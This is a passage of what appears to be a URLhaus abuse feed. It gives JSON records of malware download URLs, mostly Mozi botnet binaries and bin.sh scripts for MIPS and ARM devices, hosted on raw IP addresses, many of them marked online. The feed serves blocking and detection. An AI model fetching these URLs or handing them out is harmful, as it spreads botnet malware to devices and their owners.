UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961108","urlhaus_reference":"https://urlhaus.abuse.ch/url/961108/","url":"http://175.214.73.205:36316/bin.sh","url_status":"offline","host":"175.214.73.205","date_added":"2021-01-14 17:29:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961107","urlhaus_reference":"https://urlhaus.abuse.ch/url/961107/","url":"http://117.248.61.75:48105/bin.sh","url_status":"offline","host":"117.248.61.75","date_added":"2021-01-14 17:28:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961103","urlhaus_reference":"https://urlhaus.abuse.ch/url/961103/","url":"http://42.231.245.237:40017/Mozi.m","url_status":"online","host":"42.231.245.237","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961104","urlhaus_reference":"https://urlhaus.abuse.ch/url/961104/","url":"http://59.99.45.199:41906/Mozi.m","url_status":"offline","host":"59.99.45.199","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961105","urlhaus_reference":"https://urlhaus.abuse.ch/url/961105/","url":"http://42.237.48.61:38607/Mozi.m","url_status":"online","host":"42.237.48.61","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961106","urlhaus_reference":"https://urlhaus.abuse.ch/url/961106/","url":"http://59.93.23.63:59331/Mozi.m","url_status":"offline","host":"59.93.23.63","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961102","urlhaus_reference":"https://urlhaus.abuse.ch/url/961102/","url":"http://182.126.118.45:53932/Mozi.m","url_status":"online","host":"182.126.118.45","date_added":"2021-01-14 17:20:24 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961101","urlhaus_reference":"https://urlhaus.abuse.ch/url/961101/","url":"http://42.230.152.22:58385/Mozi.m","url_status":"online","host":"42.230.152.22","date_added":"2021-01-14 17:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961099","urlhaus_reference":"https://urlhaus.abuse.ch/url/961099/","url":"http://186.33.105.12:57010/Mozi.m","url_status":"online","host":"186.33.105.12","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961100","urlhaus_reference":"https://urlhaus.abuse.ch/url/961100/","url":"http://222.137.33.111:59715/Mozi.m","url_status":"online","host":"222.137.33.111","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961094","urlhaus_reference":"https://urlhaus.abuse.ch/url/961094/","url":"http://42.231.120.221:57052/Mozi.m","url_status":"online","host":"42.231.120.221","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961095","urlhaus_reference":"https://urlhaus.abuse.ch/url/961095/","url":"http://182.117.11.37:60550/Mozi.m","url_status":"online","host":"182.117.11.37","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961096","urlhaus_reference":"https://urlhaus.abuse.ch/url/961096/","url":"http://186.33.104.144:39684/Mozi.m","url_status":"offline","host":"186.33.104.144","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961097","urlhaus_reference":"https://urlhaus.abuse.ch/url/961097/","url":"http://122.188.41.69:43593/Mozi.a","url_status":"online","host":"122.188.41.69","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961098","urlhaus_reference":"https://urlhaus.abuse.ch/url/961098/","url":"http://125.42.207.154:36066/Mozi.m","url_status":"offline","host":"125.42.207.154","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961093","urlhaus_reference":"https://urlhaus.abuse.ch/url/961093/","url":"http://115.230.82.41:35006/Mozi.m","url_status":"online","host":"115.230.82.41","date_added":"2021-01-14 17:19:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961091","urlhaus_reference":"https://urlhaus.abuse.ch/url/961091/","url":"http://113.90.177.157:38184/Mozi.m","url_status":"online","host":"113.90.177.157","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961092","urlhaus_reference":"https://urlhaus.abuse.ch/url/961092/","url":"http://112.228.183.24:59027/Mozi.m","url_status":"online","host":"112.228.183.24","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961090","urlhaus_reference":"https://urlhaus.abuse.ch/url/961090/","url":"http://117.192.226.105:50639/Mozi.m","url_status":"offline","host":"117.192.226.105","date_added":"2021-01-14 17:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961086","urlhaus_reference":"https://urlhaus.abuse.ch/url/961086/","url":"http://115.54.242.73:33534/Mozi.a","url_status":"online","host":"115.54.242.73","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961087","urlhaus_reference":"https://urlhaus.abuse.ch/url/961087/","url":"http://115.54.208.19:36316/Mozi.m","url_status":"online","host":"115.54.208.19","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961088","urlhaus_reference":"https://urlhaus.abuse.ch/url/961088/","url":"http://115.97.18.154:47120/Mozi.m","url_status":"offline","host":"115.97.18.154","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961089","urlhaus_reference":"https://urlhaus.abuse.ch/url/961089/","url":"http://117.213.42.231:46287/Mozi.m","url_status":"offline","host":"117.213.42.231","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961085","urlhaus_reference":"https://urlhaus.abuse.ch/url/961085/","url":"http://42.236.149.218:39536/bin.sh","url_status":"online","host":"42.236.149.218","date_added":"2021-01-14 17:14:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961083","urlhaus_reference":"https://urlhaus.abuse.ch/url/961083/","url":"http://59.94.181.146:40689/Mozi.m","url_status":"offline","host":"59.94.181.146","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961084","urlhaus_reference":"https://urlhaus.abuse.ch/url/961084/","url":"http://58.249.83.3:51123/Mozi.m","url_status":"online","host":"58.249.83.3","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961082","urlhaus_reference":"https://urlhaus.abuse.ch/url/961082/","url":"http://49.77.198.90:52540/Mozi.a","url_status":"online","host":"49.77.198.90","date_added":"2021-01-14 17:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961081","urlhaus_reference":"https://urlhaus.abuse.ch/url/961081/","url":"http://59.96.27.213:56964/Mozi.m","url_status":"offline","host":"59.96.27.213","date_added":"2021-01-14 17:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961078","urlhaus_reference":"https://urlhaus.abuse.ch/url/961078/","url":"http://61.52.62.80:57120/Mozi.m","url_status":"online","host":"61.52.62.80","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961079","urlhaus_reference":"https://urlhaus.abuse.ch/url/961079/","url":"http://58.248.113.219:44518/Mozi.a","url_status":"online","host":"58.248.113.219","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961080","urlhaus_reference":"https://urlhaus.abuse.ch/url/961080/","url":"http://58.249.22.124:50389/Mozi.m","url_status":"online","host":"58.249.22.124","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961077","urlhaus_reference":"https://urlhaus.abuse.ch/url/961077/","url":"http://42.224.241.176:34335/Mozi.m","url_status":"online","host":"42.224.241.176","date_added":"2021-01-14 17:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961069","urlhaus_reference":"https://urlhaus.abuse.ch/url/961069/","url":"http://42.234.234.40:54865/Mozi.m","url_status":"online","host":"42.234.234.40","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961070","urlhaus_reference":"https://urlhaus.abuse.ch/url/961070/","url":"http://27.41.216.92:50773/Mozi.a","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961071","urlhaus_reference":"https://urlhaus.abuse.ch/url/961071/","url":"http://42.237.56.242:52005/Mozi.m","url_status":"online","host":"42.237.56.242","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961072","urlhaus_reference":"https://urlhaus.abuse.ch/url/961072/","url":"http://222.139.126.241:56066/Mozi.m","url_status":"online","host":"222.139.126.241","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961073","urlhaus_reference":"https://urlhaus.abuse.ch/url/961073/","url":"http://222.137.133.120:32915/Mozi.m","url_status":"online","host":"222.137.133.120","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961074","urlhaus_reference":"https://urlhaus.abuse.ch/url/961074/","url":"http://222.137.123.31:43462/Mozi.a","url_status":"online","host":"222.137.123.31","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961075","urlhaus_reference":"https://urlhaus.abuse.ch/url/961075/","url":"http://219.157.163.74:33291/Mozi.m","url_status":"online","host":"219.157.163.74","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961076","urlhaus_reference":"https://urlhaus.abuse.ch/url/961076/","url":"http://220.125.119.222:1440/Mozi.m","url_status":"offline","host":"220.125.119.222","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961068","urlhaus_reference":"https://urlhaus.abuse.ch/url/961068/","url":"http://123.10.35.174:55907/Mozi.a","url_status":"online","host":"123.10.35.174","date_added":"2021-01-14 17:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961066","urlhaus_reference":"https://urlhaus.abuse.ch/url/961066/","url":"http://117.247.201.31:33181/Mozi.a","url_status":"offline","host":"117.247.201.31","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961067","urlhaus_reference":"https://urlhaus.abuse.ch/url/961067/","url":"http://182.121.150.204:44691/Mozi.m","url_status":"online","host":"182.121.150.204","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961059","urlhaus_reference":"https://urlhaus.abuse.ch/url/961059/","url":"http://125.42.26.224:55254/Mozi.m","url_status":"online","host":"125.42.26.224","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961060","urlhaus_reference":"https://urlhaus.abuse.ch/url/961060/","url":"http://186.33.123.24:43010/Mozi.m","url_status":"online","host":"186.33.123.24","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961061","urlhaus_reference":"https://urlhaus.abuse.ch/url/961061/","url":"http://125.41.217.246:37886/Mozi.m","url_status":"offline","host":"125.41.217.246","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961062","urlhaus_reference":"https://urlhaus.abuse.ch/url/961062/","url":"http://182.116.77.111:40153/Mozi.m","url_status":"online","host":"182.116.77.111","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961063","urlhaus_reference":"https://urlhaus.abuse.ch/url/961063/","url":"http://182.117.92.19:34305/Mozi.a","url_status":"online","host":"182.117.92.19","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961064","urlhaus_reference":"https://urlhaus.abuse.ch/url/961064/","url":"http://182.127.97.21:35653/Mozi.m","url_status":"online","host":"182.127.97.21","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961065","urlhaus_reference":"https://urlhaus.abuse.ch/url/961065/","url":"http://117.242.209.98:48908/Mozi.m","url_status":"offline","host":"117.242.209.98","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961058","urlhaus_reference":"https://urlhaus.abuse.ch/url/961058/","url":"http://113.118.12.200:40035/Mozi.m","url_status":"online","host":"113.118.12.200","date_added":"2021-01-14 17:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961055","urlhaus_reference":"https://urlhaus.abuse.ch/url/961055/","url":"http://117.222.166.125:54461/Mozi.a","url_status":"offline","host":"117.222.166.125","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961056","urlhaus_reference":"https://urlhaus.abuse.ch/url/961056/","url":"http://116.75.214.130:51991/Mozi.m","url_status":"offline","host":"116.75.214.130","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961057","urlhaus_reference":"https://urlhaus.abuse.ch/url/961057/","url":"http://112.168.65.51:41143/i","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961054","urlhaus_reference":"https://urlhaus.abuse.ch/url/961054/","url":"http://221.15.254.11:51095/i","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 17:02:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961053","urlhaus_reference":"https://urlhaus.abuse.ch/url/961053/","url":"http://58.255.142.90:36558/Mozi.a","url_status":"online","host":"58.255.142.90","date_added":"2021-01-14 16:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961050","urlhaus_reference":"https://urlhaus.abuse.ch/url/961050/","url":"http://59.96.37.94:47548/Mozi.m","url_status":"offline","host":"59.96.37.94","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961051","urlhaus_reference":"https://urlhaus.abuse.ch/url/961051/","url":"http://59.97.172.183:35796/Mozi.m","url_status":"offline","host":"59.97.172.183","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961052","urlhaus_reference":"https://urlhaus.abuse.ch/url/961052/","url":"http://58.255.142.229:42765/Mozi.m","url_status":"online","host":"58.255.142.229","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961048","urlhaus_reference":"https://urlhaus.abuse.ch/url/961048/","url":"http://189.51.106.169:37388/Mozi.a","url_status":"offline","host":"189.51.106.169","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961049","urlhaus_reference":"https://urlhaus.abuse.ch/url/961049/","url":"http://222.140.170.6:56849/Mozi.m","url_status":"online","host":"222.140.170.6","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961047","urlhaus_reference":"https://urlhaus.abuse.ch/url/961047/","url":"http://186.33.123.64:35574/Mozi.m","url_status":"online","host":"186.33.123.64","date_added":"2021-01-14 16:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961046","urlhaus_reference":"https://urlhaus.abuse.ch/url/961046/","url":"http://123.10.187.158:46947/Mozi.m","url_status":"online","host":"123.10.187.158","date_added":"2021-01-14 16:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961043","urlhaus_reference":"https://urlhaus.abuse.ch/url/961043/","url":"http://117.192.226.243:34452/Mozi.m","url_status":"offline","host":"117.192.226.243","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961044","urlhaus_reference":"https://urlhaus.abuse.ch/url/961044/","url":"http://119.123.223.174:33017/Mozi.m","url_status":"offline","host":"119.123.223.174","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961045","urlhaus_reference":"https://urlhaus.abuse.ch/url/961045/","url":"http://115.58.133.223:55061/Mozi.m","url_status":"online","host":"115.58.133.223","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961040","urlhaus_reference":"https://urlhaus.abuse.ch/url/961040/","url":"http://115.63.36.66:50046/Mozi.m","url_status":"online","host":"115.63.36.66","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961041","urlhaus_reference":"https://urlhaus.abuse.ch/url/961041/","url":"http://115.56.133.53:51960/Mozi.a","url_status":"online","host":"115.56.133.53","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961042","urlhaus_reference":"https://urlhaus.abuse.ch/url/961042/","url":"http://117.247.203.62:42372/Mozi.m","url_status":"offline","host":"117.247.203.62","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961039","urlhaus_reference":"https://urlhaus.abuse.ch/url/961039/","url":"http://113.88.211.251:51592/Mozi.m","url_status":"offline","host":"113.88.211.251","date_added":"2021-01-14 16:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961038","urlhaus_reference":"https://urlhaus.abuse.ch/url/961038/","url":"http://103.146.233.126:35585/Mozi.a","url_status":"offline","host":"103.146.233.126","date_added":"2021-01-14 16:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961035","urlhaus_reference":"https://urlhaus.abuse.ch/url/961035/","url":"http://115.51.91.178:38398/Mozi.m","url_status":"online","host":"115.51.91.178","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961036","urlhaus_reference":"https://urlhaus.abuse.ch/url/961036/","url":"http://115.55.60.104:59880/Mozi.m","url_status":"online","host":"115.55.60.104","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961037","urlhaus_reference":"https://urlhaus.abuse.ch/url/961037/","url":"http://113.92.158.127:39138/Mozi.a","url_status":"online","host":"113.92.158.127","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961033","urlhaus_reference":"https://urlhaus.abuse.ch/url/961033/","url":"http://221.15.254.11:51095/bin.sh","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961034","urlhaus_reference":"https://urlhaus.abuse.ch/url/961034/","url":"http://115.56.31.76:45117/i","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961032","urlhaus_reference":"https://urlhaus.abuse.ch/url/961032/","url":"http://59.13.193.79:50204/Mozi.m","url_status":"online","host":"59.13.193.79","date_added":"2021-01-14 16:37:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961029","urlhaus_reference":"https://urlhaus.abuse.ch/url/961029/","url":"http://59.93.18.69:45079/Mozi.m","url_status":"offline","host":"59.93.18.69","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961030","urlhaus_reference":"https://urlhaus.abuse.ch/url/961030/","url":"http://59.99.136.43:52238/Mozi.m","url_status":"offline","host":"59.99.136.43","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961031","urlhaus_reference":"https://urlhaus.abuse.ch/url/961031/","url":"http://42.230.66.23:40312/Mozi.m","url_status":"online","host":"42.230.66.23","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961026","urlhaus_reference":"https://urlhaus.abuse.ch/url/961026/","url":"http://59.97.169.179:39002/Mozi.a","url_status":"offline","host":"59.97.169.179","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961027","urlhaus_reference":"https://urlhaus.abuse.ch/url/961027/","url":"http://27.41.216.92:50773/Mozi.m","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961028","urlhaus_reference":"https://urlhaus.abuse.ch/url/961028/","url":"http://59.96.39.140:50050/Mozi.m","url_status":"offline","host":"59.96.39.140","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not 